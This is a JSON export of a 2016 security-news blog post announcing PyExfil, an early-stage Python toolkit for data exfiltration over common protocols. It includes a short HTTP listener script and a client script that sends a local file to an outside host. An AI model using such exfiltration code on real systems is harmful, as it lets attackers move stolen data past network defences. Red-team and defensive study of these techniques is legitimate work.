{"id":4275,"date":"2016-11-22T03:48:19","date_gmt":"2016-11-21T19:48:19","guid":{"rendered":"https:\/\/www.darknet.org.uk\/?p=4275"},"modified":"2016-11-22T03:48:28","modified_gmt":"2016-11-21T19:48:28","slug":"pyexfil-python-data-exfiltration-tools","status":"publish","type":"post","link":"https:\/\/www.darknet.org.uk\/2016\/11\/pyexfil-python-data-exfiltration-tools\/","title":{"rendered":"PyExfil – Python Data Exfiltration Tools"},"content":{"rendered":"
PyExfil started as a Proof of Concept (PoC) and has ended up turning into a Python Data Exfiltration toolkit, which can execute various techniques based around commonly allowed protocols (HTTP, ICMP, DNS etc).<\/p>\n
<\/p>\n
The package is very early stage (alpha release) so is not fully tested, any feedback and commits are welcomed by the author.<\/p>\n
Currently PyExfil supports:<\/p>\n
#!\/usr\/bin\/python\r\nfrom exfiltration.http_exfiltration import *\r\ndef main():\r\n print \"Starting a listener: \"\r\n listen(\"127.0.0.1\", 80)\r\n\r\nif __name__ == \"__main__\":\r\n main()<\/pre>\nHTTP Exfiltration Client<\/h4>\n
#!\/usr\/bin\/python\r\n\r\nfrom exfiltration.http_exfiltration import *\r\n\r\ndef main():\r\n FILE_TO_EXFIL = \"\/bin\/bash\"\r\n ADDR = \"www.morirt.com\"\r\n\r\n if send_file(ADDR, FILE_TO_EXFIL) == 0:\r\n print \"File exfiltrated okay.\"\r\n else:\r\n print \"Damn thing failed.\"\r\n\r\nif __name__ == \"__main__\":\r\n main()<\/pre>\n